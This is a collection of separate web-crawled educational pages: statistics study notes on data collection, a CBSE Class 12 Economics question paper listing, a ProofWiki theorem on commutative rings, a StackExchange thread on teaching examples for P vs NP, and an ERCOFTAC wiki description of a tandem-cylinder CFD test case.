It is necessary to collect numerical data. It is the first step in all statistical enquiry. The investigator who collects the data should consider the following before he proceeds to collect them.
1. purpose of enquiry
2. sources of data
3. methods of data collection
4. nature and type of enquiry
5. unit of collection
Question 4.
What precautions are needed before using the secondary data?
1. The investigator must ensure that the data are suitable for the purpose of the enquiry.
2. The investigator should also see what type of data adequate for the in estigation.
3. The investigator must ensure whether the data are reliable to be used.
• The status of the agency which collected the data.
• The method used for collecting data.
Question 5.
What is direct personal investigation? What are its merits and demerits?
Direct personal investigation:
According to this method, investigator organises personal contact with those from whom the information is to be obtained.
Merits:
• The investigator personally collects the information, the data are original and accurate.
• The questions can be explained to the informant according to his education standards.
• Data obtained through this method are uniform and homogenous.
Demerits:
• This method suffers from personal elements and hence conclusions and inferences are likely to be biased.
• This method of collecting data is very complex.
• This method involves unnecessary wastage of time and money.
Question 6.
Explain the mail questionnaire method of data collection?
Some surveys can be conducted through the use of mail questionnaire. Under this method, a list of questions pertaining to the enquiry is prepared and sent to various informants by post.
The questionnaire contains questions, and provide space for answers. A request is made to the informants through a covering letter to fill up questionnaire and send it back within a specified time.
Merits:
1. The merit of this method is that it does not allow the influencing of the respondent by the interviewer.
2. Mailing costs are much lower than the costs of personal visits.
3. It allow the respondents to remain anonymous.
4. It can reach all groups including those whose personal specialization is not possible.
Demerits:
1. This method can be adopted where the informants are literate people.
2. It includes some uncertainty about the response.
3. The informations supplied by the informants may not be correct.
Question 7.
Distinguish between sampling and non-sampling methods. | 2023-02-04 08:09:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2656671106815338, "perplexity": 3282.094761092524}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500095.4/warc/CC-MAIN-20230204075436-20230204105436-00574.warc.gz"} |
https://www.shaalaa.com/question-paper-solution/cbse-cbse-12-economics-class-12-2014-2015-delhi-set-1_7928 | # Economics Delhi Set 1 2014-2015 CBSE (Commerce) Class 12 Question Paper Solution
Economics [Delhi Set 1]
Date: March 2015
[1] 1
Give the equation of Budget Line.
Concept: Types of Budget
Chapter: [0.05] Government Budget and the Economy
[1] 2
When the income of the consumer falls the impact on a price-demand curve of an inferior good is: (choose the correct alternative)
a. Shifts to the right.
b. Shifts of the left.
c. There is upward movement along the curve.
d. There is downward movement along the curve
Concept: Demand
Chapter: [0.02] Consumer Equilibrium and Demand
[1] 3
If Marginal Rate of Substitution is constant throughout, the Indifference curve will be :(choose the correct alternative)
a. Parallel to the x-axis.
b. Downward sloping concave.
c. Downward sloping convex.
d. Downward sloping straight line.
Concept: Indifference Curve
Chapter: [0.02] Consumer Equilibrium and Demand
[3] 4
Giving reason comment on the shape of Production Possibilities curve based on the following schedule :
Good X (units) Good Y (units) 0 10 1 9 2 7 3 4 4 0
Concept: Concept of Production
Chapter: [0.03] Producer Behaviour and Supply
[3] 5
[3] 5.1
What will be the impact of recently launched 'Clean India Mission' (Swachh Bharat Mission) on the Production Possibilities curve of the economy and why?
Concept: Concept of Production
Chapter: [0.03] Producer Behaviour and Supply
[3] 5.2
What will likely be the impact of large-scale outflow of foreign capital on Production Possibilities curve of the economy and why?
Concept: Concept of Production
Chapter: [0.03] Producer Behaviour and Supply
[3] 6
The measure of price elasticity of demand of a normal good carries minus sign while price elasticity of supply carries plus sign. Explain why?
Concept: Elasticity of Demand
Chapter: [0.02] Consumer Equilibrium and Demand
[3] 7
Explain ‘large number of buyers and sellers' features of a perfectly competitive market.
Concept: Features of Perfect Competition
Chapter: [0.04] Forms of Market and Price Determination
[3] 8
What is maximum price ceiling? Explain its implications.
Concept: Price Ceiling
Chapter: [0.04] Forms of Market and Price Determination
[4] 9
A consumer spends Rs 1000 on a good priced at Rs 8 per unit. When price rises by 25 percent, the consumer continues to spend Rs 1000 on the good. Calculate the price elasticity of demand by percentage method.
Concept: Elasticity of Demand
Chapter: [0.02] Consumer Equilibrium and Demand
[4] 10 | Attempt Any One
[4] 10.1
Define cost.
Concept: Cost - Fixed Cost
Chapter: [0.03] Producer Behaviour and Supply
State the relation between marginal cost and average variable cost.
Concept: Cost - Average Variable Cost
Chapter: [0.03] Producer Behaviour and Supply
[4] 10.2
Define revenue
Concept: Measures of Government Deficit Or Surpluses
Chapter: [0.05] Government Budget and the Economy
State the relation between marginal revenue and average revenue.
Concept: Measures of Government Deficit Or Surpluses
Chapter: [0.05] Government Budget and the Economy
[6] 11 | Attempt Any One
[6] 11.1
A consumer consumes only two goods X and Y both priced at Rs 3 per unit. If the consumer chooses a combination of these two goods with Marginal Rate of Substitution equal to 3, is the consumer in equilibrium? Give reasons. What will a rational consumer do in this situation? Explain
Concept: Consumer's Equilibrium
Chapter: [0.02] Consumer Equilibrium and Demand
[6] 11.2
A consumer consumes only two goods X and Y whose prices are Rs 4 and Rs 5 per unit respectively. If the consumer chooses a combination of the two goods with marginal utility of X equal to 5 and that of Y equal to 4, is the consumer in equilibrium? Give reason. What will a rational consumer do in this situation? Use utility analysis.
Concept: Consumer's Equilibrium
Chapter: [0.02] Consumer Equilibrium and Demand
[6] 12
State the behaviour of marginal product in the law of variable proportions. Explain the causes of this behaviour
Concept: Law of Variable Proportions
Chapter: [0.03] Producer Behaviour and Supply
[6] 13
Why is the equality between marginal cost and marginal revenue necessary for a firm to be in equilibrium? Is it sufficient to ensure equilibrium? Explain.
Concept: Concept of Producer's Equilibrium
Chapter: [0.03] Producer Behaviour and Supply
[6] 14
A market for a good is in equilibrium. The demand for the good 'increases'. Explain the chain of effects of this change.
Concept: Market Equilibrium
Chapter: [0.04] Forms of Market and Price Determination
[1] 15
Define aggregate supply?
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
[1] 16
The value of the multiplier is: (choose the correct alternative)
a. 1/"MPC"
b. 1/"MPS"
c. 1/(1-"MPS")
d. 1/(MPC- 1)
Concept: Investment Multiplier and Its Mechanism
Chapter: [0.04] Determination of Income and Employment
[1] 17
Borrowing in government budget is ______.
Revenue deficit
Fiscal deficit
Primary deficit
Deficit in taxes
Concept: Meaning of Government Budget
Chapter: [0.05] Government Budget and the Economy
[1] 18
The non-tax revenue in the following is: (choose the correct alternative)
a. Export duty
b. Import duty
c. Dividends
d. Excise
Concept: Direct and Indirect Tax
Chapter: [0.05] Government Budget and the Economy
[1] 19
Other things remaining unchanged, when in a country the price of foreign currency rises, national income is: (choose the correct alternative)
a. Likely to rise
b. Likely to fall
c. Likely to rise and fall both
d. Not affected
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
[3] 20
If Real GDP is Rs 200 and Price Index (with base = 100) is 110, calculate Nominal GDP
Concept: Gross and Net Domestic Product (GDP and NDP)
Chapter: [0.02] National Income and Related Aggregates
[3] 21 | Attempt Any One
[3] 21.1
Name the broad categories of transactions recorded in the 'capital account' of the Balance of Payments Account
Concept: Concept of Balance of Payments Account
Chapter: [0.06] Balance of Payments
[3] 21.2
Name the broad categories of transactions recorded in the 'current account' of the Balance of Payments Accounts
Concept: Concept of Balance of Payments Account
Chapter: [0.06] Balance of Payments
[3] 22
Where will the sale of machinery to abroad be recorded in the Balance of Payments Accounts? Give reasons.
Concept: Concept of Balance of Payments Account
Chapter: [0.06] Balance of Payments
[4] 23 | Attempt Any One
[4] 23.1
Explain the ‘bank of issue’ function of central bank.
Concept: Function of Central Bank - Bank of Issue
Chapter: [0.03] Money and Banking
[4] 23.2
Explain "Banker to the Government" function of the Central Bank.
Concept: Central Bank Function - Goverment Bank
Chapter: [0.03] Money and Banking
[4] 24
A government of India has recently launched 'Jan-Dhan Yojana' aimed at every household in the country to have at least one bank account. Explain how deposits made under the plan are going to affect the national income of the country.
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
[4] 25
An economy is in equilibrium. Calculate national income from the following :
Autonomous consumption = 100
Marginal propensity to save = 0.2
Investment expenditure = 200
Concept: Consumption Function and Propensity to Save
Chapter: [0.04] Determination of Income and Employment
[6] 26
Giving reason explain how should the following be treated in the estimation of national income:
Expenditure by a firm on payment of fees to a chartered accountant
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
Giving reason explain how should the following be treated in the estimation of national income:
Payment of corporate tax by a firm
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
Giving reason explain how should the following be treated in the estimation of national income:
Purchase of refrigerator by a firm for own use
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
[6] 27
[6] 27.1
What is meant by inflationary gap?
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
Explain the role of Repo Rate in reducing the Inflationary gap.
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
[6] 27.2
Explain the concept of Deflationary Gap
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
Explain the role of 'Open Market Operations' in reducing Deflationary Gap
Concept: Concept of Aggregate Demand and Aggregate Supply
Chapter: [0.04] Determination of Income and Employment
[6] 28
Explain the role of government budget in influencing the allocation of resources.
Concept: Government Budget - Allocation of Resources
Chapter: [0.05] Government Budget and the Economy
[6] 29
Calculation National Income and Personal Disposable Income:
(Rs crores) 1 Personal tax 80 2 Private final consumption expenditure 600 3 Undistributed profits 30 4 Private income 650 5 Government final consumption expenditure 100 6 Corporate tax 50 7 Net domestic fixed capital formation 70 8 Net indirect tax 60 9 Depreciation 14 10 Change in stocks (-)10 11 Net imports 20 12 Net factor income to abroad 10
Concept: Concept of National Income
Chapter: [0.02] National Income and Related Aggregates
#### Request Question Paper
If you dont find a question paper, kindly write to us
View All Requests
#### Submit Question Paper
Help us maintain new question papers on Shaalaa.com, so we can continue to help students
only jpg, png and pdf files
## CBSE previous year question papers Class 12 Economics with solutions 2014 - 2015
CBSE Class 12 Economics question paper solution is key to score more marks in final exams. Students who have used our past year paper solution have significantly improved in speed and boosted their confidence to solve any question in the examination. Our CBSE Class 12 Economics question paper 2015 serve as a catalyst to prepare for your Economics board examination.
Previous year Question paper for CBSE Class 12 Economics-2015 is solved by experts. Solved question papers gives you the chance to check yourself after your mock test.
By referring the question paper Solutions for Economics, you can scale your preparation level and work on your weak areas. It will also help the candidates in developing the time-management skills. Practice makes perfect, and there is no better way to practice than to attempt previous year question paper solutions of CBSE Class 12.
How CBSE Class 12 Question Paper solutions Help Students ?
• Question paper solutions for Economics will helps students to prepare for exam.
• Question paper with answer will boost students confidence in exam time and also give you an idea About the important questions and topics to be prepared for the board exam.
• For finding solution of question papers no need to refer so multiple sources like textbook or guides. | 2022-11-26 19:48:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1994001269340515, "perplexity": 9490.600076182942}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446708046.99/warc/CC-MAIN-20221126180719-20221126210719-00439.warc.gz"} |
https://proofwiki.org/wiki/Structure_Induced_by_Commutative_Ring_Operations_is_Commutative_Ring | Structure Induced by Commutative Ring Operations is Commutative Ring
Theorem
Let $\struct {R, +, \circ}$ be a commutative ring.
Let $S$ be a set.
Let $\struct {R^S, +', \circ'}$ be the structure on $R^S$ induced by $+'$ and $\circ'$.
Then $\struct {R^S, +', \circ'}$ is a commutative ring.
Proof
By Structure Induced by Ring Operations is Ring then $\struct {R^S, +', \circ'}$ is a ring.
From Structure Induced by Commutative Operation is Commutative, so is the pointwise operation $\circ$ induces on $R^S$.
The result follows by definition of commutative ring.
$\blacksquare$ | 2020-08-10 06:04:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9493433237075806, "perplexity": 148.4463015681271}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738609.73/warc/CC-MAIN-20200810042140-20200810072140-00162.warc.gz"} |
https://cstheory.stackexchange.com/questions/16803/p-vs-np-instructive-example-of-when-brute-force-search-can-be-avoided/16807 | # P vs NP: Instructive example of when Brute Force search can be avoided
To be able to explain the P vs NP problem to non-mathematicians I would like to have a pedagogical example of when Brute Force-search can be avoided. The problem should ideally be immediately understandable and the trick should neither be too easy nor too hard.
The best I've come up with so far is
SUBSET_PRODUCT_IS_ZERO
The problem is easy to understand (given a set of integers, can a subset with product 0 be formed?), but the trick is too easy (check if 0 is among the given numbers, i.e. it's not necessary to look at a lot of subsets).
Any suggestions?
• – Dave Clarke Mar 8 '13 at 19:36
• Do you want a better-than-bruteforce algorithm for an NP-complete problem or for a silly problem, like subset-product-is-0? How about the trick that does $2^{n/2 + o(n)}$ for subset sum, see e.g. the horowitz and sahni algorithm here rjlipton.wordpress.com/2010/02/05/… – Sasho Nikolov Mar 8 '13 at 19:43
• Perhaps I didn't understand well the question, but if you need an easy understandable problem in P with an "intermediate level" polynomial time algorithm, then I suggest the classical 2-CNF satisfiability. – Marzio De Biasi Mar 8 '13 at 19:46
• How about 2-Coloring vs 3-Coloring? – Serge Gaspers Mar 9 '13 at 0:29
• THe way this question is written seems to presuppose that NP-complete problems can only be solved by brute force search. That would be a mistake. For instance the naive brute force search for the traveling salesman problem takes $O(n!)$ time whereas it can be solved by a non-brute-force dynamic programming algorithm in the much faster time bound $O(n^2 2^n)$. – David Eppstein Mar 9 '13 at 17:03
I recommend Jenga!
Assuming you have two perfectly logical, sober, and dextrous players, Jenga is a perfect-information two-player game, just like Checkers or Go. Suppose the game starts with a stack of $3N$ bricks, with 3 bricks in each level. For most of the game, each player has $\Theta(N)$ choices at each turn for the next move, and in the absence of stupid mistakes, the number of turns is always between $N$ and $6N$. So crudely, the game tree has $N^{\Theta(N)}$ states. If you explored the game tree by brute force, you might spend exponential time to find a winning move or convince yourself that you can't win.
But in fact, Uri Zwick proved in 2005 that you can play Jenga perfectly by keeping track of just three integers, using a simple set of rules that you can easily fit on a business card. The three numbers you need are
• $m =$ the number of levels (not counting the top level) with three bricks.
• $n =$ the number of levels (not counting the top level) with two bricks side by side.
• $t =$ the number of bricks in the top level (0, 1, 2, or 3).
In fact, most of the time, you only have to remember $n\bmod 3$ and $m\bmod 3$ instead of $n$ and $m$. Here is the complete winning strategy:
Here I-I means you should move the middle brick from any 3-layer the top, II- means you should move a side brick from a 3-layer to the top, -I- means you should move a side brick from a 2-layer to the top, and the bob-omb means you should think about death and get sad and stuff. If there's more than one suggested move in a box, you can choose any one of them. It's trivial to execute this strategy in $O(1)$ time if you already know the triple $(m,n,t)$, or in $O(N)$ time if you don't.
Moral: Jenga is only fun if everyone is clumsy and/or drunk.
• That's an excellent teaching example, but I would've given the +1 for the Pilgrim reference alone. – Luke Mathieson Mar 9 '13 at 0:24
A cashier has to return $x$ cents of change to a customer. Given the coins she has available, can she do it and how?
• Brute force: consider all possible collections of coins and see if one of them adds up to $x$.
• Non-brute force: do it as every cashier does, by dynamic programming.
There are two variants of the problem:
1. Easy: the cashier has unlimited supply of all denominations.
2. Harder: the cashier has a limited supply of coins.
The easy variant can be solved with a greedy algorithm. The harder one requires dynamic programming.
Actually, the way to present this is to propose the brute force solution, get people to understand that it is very inefficient, and then ask them what cashiers do, first for the easy variant, then in the hard one. You should have some examples available that go from easy to nasty.
I think I found an useful example myself!
Perhaps I was a little vague, but I was looking for a problem that met the following specifications:
• The problem itself should be easy to explain to someone studying social sciences.
• It should have an obvious but ineffective algorithm.
• It should have a better algorithm that is also easy to explain to someone studying social sciences.
For Eulerian Cycle it's easy to explain that it's a necessary condition that every node must have even degree, but it isn't as easy to explain why it's a sufficient condition.
This is the problem that I think so far best meets the specification above:
FORM_TARGET_SET_WITH_UNIONS
Collection $C=\{S_1, S_2,...,S_n\}$ of sets
Target set $T$
Question: Is it possible to form target set $T$ by taking the union of some of the sets in $C$ ?
Obvious but ineffective algorithm:
• Form all $2^n$ possible unions
• See if one of them corresponds to $T$
Better algorithm
• Mark the sets in $C$ that are contained in $T$
• Form the union $S_{_\cup}$ of these sets
• If $|S_{_\cup}|=|T|$ answer $YES$, otherwise answer $NO$
There is also the sister problem
FORM_TARGET_SET_WITH_INTERSECTIONS
for which the better algorithm is
• Mark the sets in $C$ that contain $T$
• Form the intersection $S_{_\cap}$ of these sets
• If $|S_{_\cap}|=|T|$ answer $YES$, otherwise answer $NO$
As you can see I was looking for something really simple (almost as simple as SUBSET_PRODUCT_IS_ZERO).
The problem can also be contrasted with SUBSET SUM and SUBSET PRODUCT, which are NP-complete but similar in their formulation. In all these problems one is presented with a collection of objects and asked if an operation on a selection of these objects can produce a desired result. | 2019-12-13 00:45:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.585793137550354, "perplexity": 449.2993021859589}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540547536.49/warc/CC-MAIN-20191212232450-20191213020450-00258.warc.gz"} |
https://kbwiki.ercoftac.org/w/index.php?title=UFR_2-12_Test_Case&diff=next&oldid=38194 | # Test Case Study
## Brief Description of the Study Test Case
A detailed description of the chosen test case (TC with L = 3.7D) is available here. So in the following we present only its brief overview.
A schematic of the airflow past the TC configuration is shown in Figure 1. The model is comprised of two cylinders of equal diameter aligned with the streamwise flow direction. The polar angle, ${\displaystyle {\theta }}$, is measured from the upstream stagnation point and is positive in the clockwise direction.
Figure 1: Schematic of TC configuration [3]
Geometric and regime parameters defining the test case are summarized in Table 1.
Table 1: Flow parameters
Parameter Notation Value
Reynolds number Re=${\displaystyle U_{0}D/\nu }$ 1.66×105
Mach number M 0.128
Separation distance ${\displaystyle L/D}$ 3.7
TC aspect ratio ${\displaystyle L_{z}/D}$ 12.4
Cylinder diameter ${\displaystyle D}$ 0.05715 m
Free stream velocity ${\displaystyle U_{0}}$ 44 m/s
Free stream turbulence intensity ${\displaystyle K}$ 0.1%
The principal measured quantities by which the success or failure of CFD calculations are to be judged are as follows:
• Mean Flow
• Distributions of time-averaged pressure coefficient, ${\displaystyle C_{p}=\langle (p-p_{0})\rangle /(1/2\rho _{0}U_{0}^{2})}$, over the surface of both cylinders;
• Distribution of time-averaged mean streamwise velocity ${\displaystyle {\left.\langle u\rangle /U_{0}\right.}}$ along a line connecting the centres of the cylinders;
• Distributions of the root-mean-square (rms) of the pressure coefficient over the surface of both cylinders;
• Power spectral density of the pressure coefficient (dB/Hz versus Hz) on the upstream cylinder at ${\displaystyle \theta }$ = 135°;
• Power spectral density of the pressure coefficient (dB/Hz versus Hz) on the downstream cylinder at ${\displaystyle \theta }$ = 45°;
• Turbulence kinetic energy
• x – y cut of the field of time-averaged two-dimensional turbulent kinetic energy ${\displaystyle {\text{TKE}}={\frac {1}{2}}\left(\langle u'u'\rangle +\langle v'v'\rangle \right)/U_{0}^{2}}$;
• 2D TKE distribution along y = 0;
• 2D TKE distribution along x = 1.5 D (in the gap between the cylinders);
• 2D TKE distribution along x = 4.45 D (0.75 D downstream of the centre of the rear cylinder).
All these and some other data are available here in both Windows and Unix compressed formats:
Windows Unix
problem_statement.pdf
problem_data_and_guidelines.pdf
data.zip data.tgz
figures.zip figures.tgz
These data are gratefully made available by the BANC-I Workshop.
## Test Case Experiments
A detailed description of the experimental facility and measurement techniques is given in the original publications [2-4]. So here we present only concise information about these aspects of the test case.
Figure 2: TC configuration in the BART facility [3]
Experiments have been conducted in the Basic Aerodynamic Research Tunnel (BART) at NASA Langley Research Center (see Figure 2). This is a subsonic, atmospheric wind-tunnel for investigation of the fundamental characteristics of complex flow-fields. The tunnel has a closed test section with a height of 0.711 m, a width of 1.016 m, and a length of 3.048 m. The span size of the cylinders was equal to the entire BART tunnel height, thus resulting in the aspect ratio Lz / D = 12.4. The free stream velocity was set to 44 m/s giving a Reynolds number based on cylinder diameter equal to 1.66 × 105 and Mach number equal to 0.128 (flow temperature T = 292 K).
The free stream turbulence level was less than 0.10%. In the first series of the experiments [2, 3], in order to ensure a turbulent separation from the upstream cylinder at the considered Reynolds number, the boundary layers on this cylinder were tripped between azimuthal locations of 50 and 60 degrees from the leading stagnation point using a transition strip. For the downstream cylinder, it was assumed that trip-like effect of turbulent wake impingement from the upstream cylinder would automatically ensure turbulent separation. However, later on [4] it was found that the effect of tripping of the downstream cylinder at L/D = 3.7 is also rather tangible (resulted in reduced peaks in mean Cp distribution along the rear cylinder, accompanied by an earlier separation from the cylinder surface, a reduced pressure recovery, lower levels of mean TKE in the wake and reduced levels of peak surface pressure fluctuations). For this reason, exactly these (with tripping of both cylinders) experimental data [4] were used for the comparison with fully turbulent CFD.
In the course of experiments, steady and unsteady pressure measurements were carried out along with 2-D Particle Image Velocimetry (PIV) and hot-wire anemometry used for documenting the flow interaction around the two cylinders (mean streamlines and instantaneous vorticity fields, shedding frequencies and spectra).
Information on the data accuracy available in the original publications [2-4] is summarized in Table 2. Most absolute values are given based on nominal tunnel conditions or on an average data value. Percentage values are quoted for parameters where the uncertainty equations were posed in terms of the uncertainty relative to the nominal value of the parameter.
Table 2: Estimated Experimental Uncertainties
Quantity Uncertainty
Drag Coefficient 0.0005
PIV: Umean, Vmean 0.03 (normalized)
PIV: Spanwise velocity 1.8 (normalized)
PIV: TKE 4%
Power Spectral Density (PSD) 10 – 20%
Cp' rms 5 – 11%
Diameter, D; Sensor spacing Δz 0.005 inch
## CFD Methods
The key physical features of the UFR (see Description) present significant difficulties for all the existing approaches to turbulence representation, whether from the standpoint of solution fidelity (for the conventional (U)RANS models) or in terms of computational expense for full LES (especially if the turbulent boundary layers are to be resolved). For this reason, most of the computational studies of multi-body flows, in general, and the TC configuration, in particular, are currently relying upon hybrid RANS-LES approaches. This is true also with regard to simulations carried out in the course of the BANC-I and II Workshops and in the framework of the ATAAC project, where different hybrid RANS-LES models of the DES type were used (see Table 3) [1].
Table 3: Summary of simulations
Partner Turbulence Modelling approach Compressible/Incompressible Lz Grid Side Walls
Beijing Tsinghua University BTU SST DDES Compressible 3D Mandatory Slip
German Aerospace Center, Göttingen DLR SA DDES Compressible 3D Mandatory Slip
New Technologies and Services, St.-Petersburg, Russia NTS SA DDES
SA IDDES
Incompressible and Compressible 3D, 16D Mandatory Slip
Technische Universität Berlin TUB SA DDES
SA IDDES
Incompressible 3D Mandatory Slip
SST - k–ω Shear Stress Transport model [9]; SA - Spalart-Allmaras model [10]; SA and SST DDES - Delayed DES based on the SA and SST models [11]; SA IDDES - Improved DDES based on the SA model [12].
As mentioned in the experiments section above, in the experiments the boundary layers on both cylinders were tripped ahead of their separation, thus justifying the "fully turbulent" simulations.
All the partners used their own flow solvers.
Particularly, BTU employed in-house compressible Navier-Stokes code with weighted, central-upwind, approximation of the inviscid fluxes based on a modification of the high-order symmetric total variation diminishing scheme. The method combines 6th order central and 5th order WENO schemes. For the time integration, an implicit LU-SGS algorithm is applied with Newton-like sub-iterations.
DLR used their unstructured TAU code with a finite volume compressible Navier-Stokes solver. The solver employs a standard central scheme with matrix dissipation with dual time stepping strategy of Jameson. The 3W Multi-Grid cycle was applied for the momentum and energy equations, whilst the SA transport equation was solved on the finest grid only. Time integration was performed with the use of explicit 3-level Runge-Kutta scheme. The method is of the 2nd order in both space and time.
NTS used in-house NTS finite-volume code. It is a structured code accepting multi-block overset grids of Chimera type. The incompressible branch of the code employs Rogers and Kwak's scheme [13] and for compressible flows Roe scheme is applied. The spatial approximation of the inviscid fluxes within these methods is performed differently in different grid blocks (see Figure 3 below). In particular, in the outer block, the 3rd-order upwind-biased scheme is used, whereas in the other blocks, a weighted 5th-order upwind-biased / 4th-order central scheme with automatic (solution-dependent) blending function [14] is employed. For the time integration, implicit 2nd-order backward Euler scheme with sub-iterations was applied.
Finally, TUB applied their in-hose multi-block structured code ELAN in the framework of the incompressible flow assumption. The pressure velocity coupling is based on the SIMPLE algorithm. For the convective terms a hybrid approach [14] with blending of 2nd-order central and upwind-biased TVD schemes was used. The time integration was similar to that of NTS.
The viscous terms of the governing equations in all the codes are approximated with the 2nd order centered scheme.
Figure 3: Mandatory grid in X-Y plane.
All the simulations were carried out on the same, "mandatory", grid which X-Y cut is shown in Figure 3). This is a multi-block structured grid designed according to guidelines for DES-like simulations [15]. The grid has 5 main blocks: 1 block in the outer or Euler Region (ER), 3 blocks in the Focus Region (FR), which includes the gap between the cylinders and the near wake of the downstream cylinder, and 1 block in the Departure Region (DR). The distance between the nodes on the forward half of the upstream cylinder is close to 0.02D and on its backward part it is 0.01D with smooth transition between the two. As a result, the total number of nodes on the surface of the upstream cylinder is 245. On the downstream cylinder there are 380 uniformly distributed nodes (the distance between the nodes is 0.008D). In the law of the wall units, the r-step closest to cylinders walls is less than 1.0. In the major part of the FR the cells are nearly isotropic with a size of about 0.02D. In the ER and DR the grid steps increase gradually (linearly with r). The total size of the grid in the XY plane is 82,000 cells.
According to recommendations of the organizers of the BANC-I Workshop, a mandatory spanwise size of the computational domain, Lz, in all the simulations was set equal to 3D. The grid-step in span-direction, Δz, was 0.02D, resulting in the nearly cubic cells in the focus region and a total number of cells about 11 million.
The boundary conditions used in the simulations were as follows.
No-slip conditions were imposed on the cylinders walls and periodic conditions were used in the z-direction, whereas the lateral boundaries were treated as frictionless walls (free-slip condition) in order to account for the blockage effect of the sidewalls of the experimental test-section at ±8.89D.
Inflow and outflow boundary conditions were different in the incompressible and compressible simulations. Particularly, in the compressible simulations of BTU and DLR characteristic boundary conditions were imposed on both inflow and outflow boundaries with no sponge layers, whereas NTS applied boundary conditions of characteristic type only at the inflow boundary, whereas at the outflow boundary a constant static pressure was specified, and the remaining flow parameters were extrapolated to the boundary from the interior of the domain. In order to avoid reflections of the waves from the outflow boundary, a sponge layer was used allocated to an additional Cartesian grid block of length 15D.
In the incompressible simulations of NTS a uniform velocity and constant pressure were specified at the inflow and outflow of the domain respectively.
1. Some participants of the BANC Workshops have used pure LES rather than DES-like approaches but these computations had the most difficulty simulating the high Reynolds aspects of the flow [5].
